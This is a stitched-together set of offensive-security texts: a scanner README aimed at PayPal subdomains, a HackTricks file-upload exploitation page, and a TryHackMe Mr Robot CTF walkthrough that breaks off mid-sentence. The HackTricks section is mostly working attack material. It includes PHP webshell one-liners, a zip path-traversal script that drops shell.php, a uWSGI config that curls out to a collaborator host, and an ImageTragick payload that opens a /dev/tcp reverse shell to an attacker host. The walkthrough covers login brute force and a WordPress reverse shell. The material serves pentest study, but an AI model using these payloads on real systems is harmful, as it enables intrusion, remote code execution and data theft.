erebus-templates/xss-reflected.yaml -interceptor -crawl -scope ".*.\.paypal.com" ``` ### Intercept and Crawl on HTTPS Scanning for XSS vulnerabilities using the intercepting proxy with all of paypal inscope while crawling on HTTPS domains. ```sh ▶ erebus -t erebus-templates/xss-reflected.yaml -interceptor -crawl -secure -scope ".*.\.paypal.com" ``` ### Tool Chaining Usage Scanning for XSS vulnerabilities across range of subdomains using subfinder and Gau ```sh ▶ echo "paypal.com" | gau | erebus -t erebus-templates/xss-reflected.yaml ``` Scan subdomains from a file in the format **https://** or **http://** ```sh ▶ cat alive | gau | erebus -t erebus-templates/xss-reflected.yaml ``` [![asciicast](https://asciinema.org/a/424487.svg)](https://asciinema.org/a/424487) ### License Erebus is distributed under [GPL-3.0 License](https://github.com/ethicalhackingplayground/erebus/blob/main/LICENSE) <h1 align="left"> <a href="https://discord.gg/MQWCem5b"><img src="static/Join-Discord.png" width="380" alt="Join Discord"></a> </h1>
# File Upload <details> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). </details> ![](<../../.gitbook/assets/image (638) (3).png>) **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} ## File Upload General Methodology Other useful extensions: * **PHP**: _.php_, _.php2_, _.php3_, ._php4_, ._php5_, ._php6_, ._php7_, .phps, ._phps_, ._pht_, ._phtm, .phtml_, ._pgif_, _.shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module_ * **Working in PHPv8**: _.php_, _.php4_, _.php5_, _.phtml_, _.module_, _.inc_, _.hphp_, _.ctp_ * **ASP**: _.asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml_ * **Jsp:** _.jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action_ * **Coldfusion:** _.cfm, .cfml, .cfc, .dbm_ * **Flash**: _.swf_ * **Perl**: _.pl, .cgi_ * **Erlang Yaws Web Server**: _.yaws_ ### Bypass file extensions checks 1. If they apply, the **check** the **previous extensions.** Also test them using some **uppercase letters**: _pHp, .pHP5, .PhAr ..._ 2. _Check **adding a valid extension before** the execution extension (use previous extensions also):_ * _file.png.php_ * _file.png.Php5_ 3. Try adding **special characters at the end.** You could use Burp to **bruteforce** all the **ascii** and **Unicode** characters. (_Note that you can also try to use the **previously** motioned **extensions**_) * _file.php%20_ * _file.php%0a_ * _file.php%00_ * _file.php%0d%0a_ * _file.php/_ * _file.php.\\_ * _file._ * _file.php...._ * _file.pHp5...._ 4. Try to bypass the protections **tricking the extension parser** of the server-side with techniques like **doubling** the **extension** or **adding junk** data (**null** bytes) between extensions. _You can also use the **previous extensions** to prepare a better payload._ * _file.png.php_ * _file.png.pHp5_ * _file.php#.png_ * _file.php%00.png_ * _file.php\x00.png_ * _file.php%0a.png_ * _file.php%0d%0a.png_ * _file.phpJunk123png_ 5. Add **another layer of extensions** to the previous check: * _file.png.jpg.php_ * _file.php%00.png%00.jpg_ 6. Try to put the **exec extension before the valid extension** and pray so the server is misconfigured. (useful to exploit Apache misconfigurations where anything with extension\*\* _**.php**_**, but** not necessarily ending in .php\*\* will execute code): * _ex: file.php.png_ 7. Using **NTFS alternate data stream (ADS)** in **Windows**. In this case, a colon character “:” will be inserted after a forbidden extension and before a permitted one. As a result, an **empty file with the forbidden extension** will be created on the server (e.g. “file.asax:.jpg”). This file might be edited later using other techniques such as using its short filename. The “**::$data**” pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. “file.asp::$data.”) 8. Try to break the filename limits. The valid extension gets cut off. And the malicious PHP gets left. AAA<--SNIP-->AAA.php ``` # Linux maximum 255 bytes /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 255 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # minus 4 here and adding .png # Upload the file and check response how many characters it alllows. Let's say 236 python -c 'print "A" * 232' AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA # Make the payload AAA<--SNIP 232 A-->AAA.php.png ``` ### Bypass Content-Type, Magic Number, Compression & Resizing * Bypass **Content-Type** checks by setting the **value** of the **Content-Type** **header** to: _image/png_ , _text/plain , application/octet-stream_ 1. Content-Type **wordlist**: [https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt) * Bypass **magic number** check by adding at the beginning of the file the **bytes of a real image** (confuse the _file_ command). Or introduce the shell inside the **metadata**:\ `exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg`\ `\` or you could also **introduce the payload directly** in an image:\ `echo '<?php system($_REQUEST['cmd']); ?>' >> img.png` * If **compressions is being added to your image**, for example using some standard PHP libraries like [PHP-GD](https://www.php.net/manual/fr/book.image.php), the previous techniques won't be useful it. However, you could use the **PLTE chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**. * [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen\_plte\_png.php) * The web page cold also be **resizing** the **image**, using for example the PHP-GD functions `imagecopyresized` or `imagecopyresampled`. However, you could use the **IDAT chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**. * [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen\_idat\_png.php) * Another technique to make a payload that **survives an image resizing**, using the PHP-GD function `thumbnailImage`. However, you could use the **tEXt chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**. * [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen\_tEXt\_png.php) ### Other Tricks to check * Find a vulnerability to **rename** the file already uploaded (to change the extension). * Find a **Local File Inclusion** vulnerability to execute the backdoor. * **Possible Information disclosure**: 1. Upload **several times** (and at the **same time**) the **same file** with the **same name** 2. Upload a file with the **name** of a **file** or **folder** that **already exists** 3. Uploading a file with **“.”, “..”, or “…” as its name**. For instance, in Apache in **Windows**, if the application saves the uploaded files in “/www/uploads/” directory, the “.” filename will create a file called “uploads” in the “/www/” directory. 4. Upload a file that may not be deleted easily such as **“…:.jpg”** in **NTFS**. (Windows) 5. Upload a file in **Windows** with **invalid characters** such as `|<>*?”` in its name. (Windows) 6. Upload a file in **Windows** using **reserved** (**forbidden**) **names** such as CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9. * Try also to **upload an executable** (.exe) or an **.html** (less suspicious) that **will execute code** when accidentally opened by victim. ### Special extension tricks If you are trying to upload files to a **PHP server**, [take a look at the **.htaccess** trick to execute code](https://book.hacktricks.xyz/pentesting/pentesting-web/php-tricks-esp#code-execution-via-httaccess).\ If you are trying to upload files to an **ASP server**, [take a look at the **.config** trick to execute code](../../network-services-pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files). The `.phar` files are like the `.jar` for java, but for php, and can be **used like a php file** (executing it with php, or including it inside a script...) The `.inc` extension is sometimes used for php files that are only used to **import files**, so, at some point, someone could have allow **this extension to be executed**. ## **Jetty RCE** If you can upload a XML file into a Jetty server you can obtain [RCE because **new \*.xml and \*.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** So, as mentioned in the following image, upload the XML file to `$JETTY_BASE/webapps/` and expect the shell! ![](<../../.gitbook/assets/image (1) (3) (1) (1) (1).png>) ## **uWSGI RCE** If you can replace the `.ini` configuration file of a [**uWSGI server you can obtain RCE**](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)**.** Indeed uWSGI configuration files can include “magic” variables, placeholders and operators defined with a precise syntax. The ‘@’ operator in particular is used in the form of @(filename) to include the contents of a file. Many uWSGI schemes are supported, including “exec” - useful to read from a process’s standard output. These operators can be weaponized for Remote Command Execution or Arbitrary File Write/Read when a .ini configuration file is parsed: Example of malicious `uwsgi.ini` file: ```ini [uwsgi] ; read from a symbol foo = @(sym://uwsgi_funny_function) ; read from binary appended data bar = @(data://[REDACTED]) ; read from http test = @(http://[REDACTED]) ; read from a file descriptor content = @(fd://[REDACTED]) ; read from a process stdout body = @(exec://whoami) ; curl to exfil via collaborator extra = @(exec://curl http://collaborator-unique-host.oastify.com) ; call a function returning a char * characters = @(call://uwsgi_func) ``` When the **configuration** file will be **parsed** **payload** will be **executed**. Note that for the config to be parsed, the **process need to be restarted** (crash? DoS?) or the file **autoreloaded** (an option that could be in use indicates the seconds to reload the file if a change is found). **Important Note:** The uWSGI parsing of configuration file is lax. The previous payload can be embedded inside a binary file(e.g. image, pdf, ...). ## **wget File Upload/SSRF Trick** In some occasions you may find that a server is using **`wget`** to **download files** and you can **indicate** the **URL**. In these cases, the code may be checking that the extension of the downloaded files is inside a whitelist to assure that only allowed files are going to be downloaded. However, **this check can be bypassed.**\ The **maximum** length of a **filename** in **linux** is **255**, however, **wget** truncate the filenames to **236** characters. You can **download a file called "A"\*232+".php"+".gif"**, this filename will **bypass** the **check** (as in this example **".gif"** is a **valid** extension) but `wget` will **rename** the file to **"A"\*232+".php"**. ```bash #Create file and HTTP server echo "SOMETHING" > $(python -c 'print("A"*(236-4)+".php"+".gif")') python3 -m http.server 9080 ``` ```bash #Download the file wget 127.0.0.1:9080/$(python -c 'print("A"*(236-4)+".php"+".gif")') The name is too long, 240 chars total. Trying to shorten... New name is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php. --2020-06-13 03:14:06-- http://127.0.0.1:9080/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif Connecting to 127.0.0.1:9080... connected. HTTP request sent, awaiting response... 200 OK Length: 10 [image/gif] Saving to: ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[===============================================>] 10 --.-KB/s in 0s 2020-06-13 03:14:06 (1.96 MB/s) - ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’ saved [10/10] ``` Note that **another option** you may be thinking of to bypass this check is to make the **HTTP server redirect to a different file**, so the initial URL will bypass the check by then wget will download the redirected file with the new name. This **won't work** **unless** wget is being used with the **parameter** `--trust-server-names` because **wget will download the redirected page with the name of the file indicated in the original URL**. #### Other resources * [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files) * [https://github.com/modzero/mod0BurpUploadScanner](https://github.com/modzero/mod0BurpUploadScanner) * [https://github.com/almandin/fuxploider](https://github.com/almandin/fuxploider) * [https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html) ## Tools * [Upload Bypass](https://github.com/sAjibuu/Upload\_Bypass) is a powerful tool designed to assist Pentesters and Bug Hunters in testing file upload mechanisms. It leverages various bug bounty techniques to simplify the process of identifying and exploiting vulnerabilities, ensuring thorough assessments of web applications. ## From File upload to other vulnerabilities * Set **filename** to `../../../tmp/lol.png` and try to achieve a **path traversal** * Set **filename** to `sleep(10)-- -.jpg` and you may be able to achieve a **SQL injection** * Set **filename** to `<svg onload=alert(document.domain)>` to achieve a XSS * Set **filename** to `; sleep 10;` to test some command injection (more [command injections tricks here](../command-injection.md)) * [**XSS** in image (svg) file upload](../xss-cross-site-scripting/#xss-uploading-files-svg) * **JS** file **upload** + **XSS** = [**Service Workers** exploitation](../xss-cross-site-scripting/#xss-abusing-service-workers) * [**XXE in svg upload**](../xxe-xee-xml-external-entity.md#svg-file-upload) * [**Open Redirect** via uploading svg file](../open-redirect.md#open-redirect-uploading-svg-files) * Try **different svg payloads** from [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)\*\*\*\* * [Famous **ImageTrick** vulnerability](https://mukarramkhalid.com/imagemagick-imagetragick-exploit/) * If you can **indicate the web server to catch an image from a URL** you could try to abuse a [SSRF](../ssrf-server-side-request-forgery/). If this **image** is going to be **saved** in some **public** site, you could also indicate a URL from [https://iplogger.org/invisible/](https://iplogger.org/invisible/) and **steal information of every visitor**. * [**XXE and CORS** bypass with PDF-Adobe upload](pdf-upload-xxe-and-cors-bypass.md) * Specially crafted PDFs to XSS: The [following page present how to **inject PDF data to obtain JS execution**](../xss-cross-site-scripting/pdf-injection.md). If you can upload PDFs you could prepare some PDF that will execute arbitrary JS following the given indications. * Upload the \[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt)) content to check if the server has any **antivirus** * Check if there is any **size limit** uploading files Here’s a top 10 list of things that you can achieve by uploading (from [link](https://twitter.com/SalahHasoneh1/status/1281274120395685889)): 1. **ASP / ASPX / PHP5 / PHP / PHP3**: Webshell / RCE 2. **SVG**: Stored XSS / SSRF / XXE 3. **GIF**: Stored XSS / SSRF 4. **CSV**: CSV injection 5. **XML**: XXE 6. **AVI**: LFI / SSRF 7. **HTML / JS** : HTML injection / XSS / Open redirect 8. **PNG / JPEG**: Pixel flood attack (DoS) 9. **ZIP**: RCE via LFI / DoS 10. **PDF / PPTX**: SSRF / BLIND XXE #### Burp Extension {% embed url="https://github.com/portswigger/upload-scanner" %} ## Magic Header Bytes * **PNG**: `"\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03["` * **JPG**: `"\xff\xd8\xff"` Refer to [https://en.wikipedia.org/wiki/List\_of\_file\_signatures](https://en.wikipedia.org/wiki/List\_of\_file\_signatures) for other filetypes. ### Zip/Tar File Automatically decompressed Upload If you can upload a ZIP that is going to be decompressed inside the server, you can do 2 things: #### Symlink Upload a link containing soft links to other files, then, accessing the decompressed files you will access the linked files: ``` ln -s ../../../index.php symindex.txt zip --symlinks test.zip symindex.txt tar -cvf test.tar symindex.txt ``` ### Decompress in different folders The decompressed files will be created in unexpected folders. One could easily assume that this setup protects from OS-level command execution via malicious file uploads but unfortunately this is not true. Since ZIP archive format supports hierarchical compression and we can also reference higher level directories we can escape from the safe upload directory by abusing the decompression feature of the target application. An automated exploit to create this kind of files can be found here: [**https://github.com/ptoomey3/evilarc**](https://github.com/ptoomey3/evilarc) ```python python2 evilarc.py -h python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php ``` You can also use the **symlink trick with evilarc**, if the flag is in `/flag.txt` make sure you crate a **symlink to that file** and **create that file in your system** so when you call evilarc it **doesn't error**. Some python code to create a malicious zip: ```python #!/usr/bin/python import zipfile from io import BytesIO def create_zip(): f = BytesIO() z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED) z.writestr('../../../../../var/www/html/webserver/shell.php', '<?php echo system($_REQUEST["cmd"]); ?>') z.writestr('otherfile.xml', 'Content of the file') z.close() zip = open('poc.zip','wb') zip.write(f.getvalue()) zip.close() create_zip() ``` To achieve remote command execution I took the following steps: 1. Create a PHP shell: ```php <?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); }?> ``` 1. Use “file spraying” and create a compressed zip file: ``` root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done root@s2crew:/tmp# ls *.php simple-backdoor.php xxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php xxAcmd.php xxAxxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php xxAxxAcmd.php xxAxxAxxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAxxAxxAcmd.php root@s2crew:/tmp# zip cmd.zip xx*.php adding: xxAcmd.php (deflated 40%) adding: xxAxxAcmd.php (deflated 40%) adding: xxAxxAxxAcmd.php (deflated 40%) adding: xxAxxAxxAxxAcmd.php (deflated 40%) adding: xxAxxAxxAxxAxxAcmd.php (deflated 40%) adding: xxAxxAxxAxxAxxAxxAcmd.php (deflated 40%) adding: xxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%) adding: xxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%) adding: xxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%) adding: xxAxxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%) root@s2crew:/tmp# ``` 3.Use a hexeditor or vi and change the “xxA” to “../”, I used vi: ``` :set modifiable :%s/xxA/..\//g :x! ``` Done! Only one step remained: Upload the ZIP file and let the application decompress it! If it is succeeds and the web server has sufficient privileges to write the directories there will be a simple OS command execution shell on the system: [![b1](https://blog.silentsignal.eu/wp-content/uploads/2014/01/b1-300x106.png)](https://blog.silentsignal.eu/wp-content/uploads/2014/01/b1.png) **Reference**: [https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/) ## ImageTragic Upload this content with an image extension to exploit the vulnerability **(ImageMagick , 7.0.1-1)** ``` push graphic-context viewbox 0 0 640 480 fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)' pop graphic-context ``` ## Embedding PHP Shell on PNG The primary reason putting a web shell in the IDAT chunk is that it has the ability to bypass resize and re-sampling operations - PHP-GD contains two functions to do this [imagecopyresized](http://php.net/manual/en/function.imagecopyresized.php) and [imagecopyresampled](http://php.net/manual/en/function.imagecopyresampled.php). Read this post: [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/) ## Polyglot Files Polyglots, in a security context, are files that are a valid form of multiple different file types. For example, a [GIFAR](https://en.wikipedia.org/wiki/Gifar) is both a GIF and a RAR file. There are also files out there that can be both GIF and JS, both PPT and JS, etc. Polyglot files are often used to bypass protection based on file types. Many applications that allow users to upload files only allow uploads of certain types, such as JPEG, GIF, DOC, so as to prevent users from uploading potentially dangerous files like JS files, PHP files or Phar files. This helps to upload a file that complins with the format of several different formats. It can allows you to upload a PHAR file (PHp ARchive) that also looks like a JPEG, but probably you will still needs a valid extension and if the upload function doesn't allow it this won't help you. More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a) <img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\ **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} <details> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). </details>
# Mr Robot CTF A TryHackMe intermediate CTF room, that based on TV show "Mr Robot" ## Tasks ### #0. Recon & Enumeration 1. Find out the subdirectory of the web application, for the lookup efficiency * You can use either dirb, dirbuster or gobuster, and I am using gobuster here * ```gobuster dir -u 10.10.206.141 -q -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt``` Option | Description --- | --- -q | Quiet mode, which only output subdirectories found -u *URL* | target URL -w *WORDLIST* | Wordlist used for subdirectory searching 2. Check services available of this web application with Nmap ```Bash nmap -A -T4 <URL> ``` Option | Description --- | --- -A | Enable OS detection, version detection, script scanning, and traceroute -T(0-5) | Set timing template (higher is faster) 3. One of the we app subdirectories give you a **wordlist** that is useful in the later stage * Look into that wordlist and you will see it is large but containing a lot of dupicate entries * It can be removed by using the following command and save it to a new dictionary file ```Bash sort <original_dic_file> | uniq > <new_dic_file> ``` * ```sort``` command is used to arrange the dictionary words in alphabetic order * ```uniq``` command is used to omit repeated entries ### #1. Key 1 * Hint : Robots * Solve : * For a website / web application, the first thing in mind with hint **__robots__** is definitely the text file *robots.txt* * [robots.txt](https://moz.com/learn/seo/robotstxt) is a text file webmasters create to instruct web robots (typically search engine robots) how to crawl pages on their website * In practice, it indicates whether certain user agents (web-crawling software) can or cannot crawl parts of a website. * These crawl instructions are specified by **“disallowing”** or **“allowing”** the behavior of certain (or all) user agents. * However, since *neither crawl instructions aren't used*in this case, thus it is just used as a general text file ![Content on the destination page](./img/K1_1_web_app_robots_robots.txt.png) * The key is stored on one of the listed path/file * Reference : * <https://moz.com/learn/seo/robotstxt> ### #2. Key 2 * Hint : White coloured font * Solve : * View raw request package * BurpSuite * An interception proxy that allows to intercept and view the raw request before sent by the browser client * Setup & instructions can be found [here](https://portswigger.net/support/getting-started-with-burp-proxy) ![View Raw POST request package in raw with Burp Suite](./img/K2A_2_burp_suite_raw_package_sent.png) * Browser inspector mode * Check out the inspector mode of your browser with shortkey CTRL + SHIFT + C (Firefox) * Navigate to ***Network*** tab * Send an arbitrary credential to login * Check out the **POST** request and click on the "**Edit and Resend**" button ![View Raw POST request package in raw with Browser Inspector Mode](./img/K2B_2_alternative_browser_raw_package_sent.png) * Brute-force login-form (./login) * WPscan * ```wpscan --url http://10.10.206.141 -t 50 -U elliot -P ~/Desktop/TryHackMe/Mr.RobotCTF/src/fsociety_sorted_unique.txt``` * Hydra (Other than WPscan) * ```hydra -f -V -l elliot -P ~/Desktop/TryHackMe/Mr.RobotCTF/src/fsociety_sorted_unique.txt -t 4 10.10.94.175 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:F=ERROR"``` * There are several ways to obtain a reverse shell on WordPress version 4.3.1, one of them is inject malicious code to *WordPress theme* * Before activate a reverse shell, it is essential to know the IP address of your machine and start the port listener * Machine's IP address (tun0, a common VPN interface name, as I am using OpenVPN) ```Bash ifconfig tun0 # Linux ``` ![Check IP address on Linux](./img/K2_7_check_local_ip.png) * Activate netcat port listener ```Bash nc -nlvp <PORT_NUMBER> ``` Option | Description --- | --- -n | Numeric-only IP addresses, no DNS -l | Listen mode, for inbound connects -v | Verbose mode, which output more often when certain events happen -p *PORT* | Local port number to work on ![Output when netcat port listener activated](./img/K2_8_ready_netcat_port_listener.png) * Reverse shell exploitation code in PHP can be found on path ```/usr/share/webshell/php``` on Kali, else can be found from original [link](http://pentestmonkey.net/tools/php-reverse-shell) * After modify the IP address variable to that of the machine to access the reverse shell, copy that to replace the source code of 404 page template ![Edit themes to replace the original 404 page source code](./img/K2A_11_edit_wp_theme_404_template_php_reverse_shell.png) * Then, access an arbitrary invalid page for the 404 page returned, and activate the reverse shell in order ![Access an invalid page to activate the reverse shell](./img/K2A_12_access_non_existing_page_on_website_404_activate_rev_shell.png) * Check the output of netcat to ensure the reverse shell is working ![CLI output when the reverse shell works and send the following data](./img/K2_13_netcat_port_listener_response_caught_rev_shell_launches_successfully.png) * We can enhance the reverse shell, like normal local shell by using the following python command/script : ```Python python -c 'import pty ; pty.spawn("/bin/bash")' ``` ![Enhanced Reverse Shell](./img/K2_14_python_script_switch_more_proper_terminal_shell.png) * After traverse around the web server, we found the file containing the 2nd flag in ```/home/robot``` directory ![list all the files in /home/robot directory](./img/K2_15_wonder_around_web_server_with_reverse_shell.png) * Since we aren't the file owner, thus it is clear that we have insufficient permission to read the text file. However, there is another file saved as **.raw-md5** extension, hence we can assume that it is a raw [MD5](https://en.wikipedia.org/wiki/MD5) hash generated from the user robot's password * Regarding the 'unhashing' method, I personally prefer using *online hashing database* to find the corresponding plaintext, in terms of efficiency since those hash entries have been cracked beforehand ![Hash cracked with online hashing database](./img/K2A_17_online_tool_to_unhash_md5_hash.png) * It also can be cracked by using [hashcat](https://hashcat.net/hashcat/), when the target hash isn't recorded in the database ```Bash hashcat -a 0 -m 0 <hash_file> <wordlist> --force ``` Option | Description --- | --- -a *ATTACK_MODE* | Select attack mode (0-7), 0 means **Straight/Dictionary Attacks** -m *HASH_TYPE* | Select the hashing algorithm on this hash --force | Ignore warnings ![Hash cracked result with 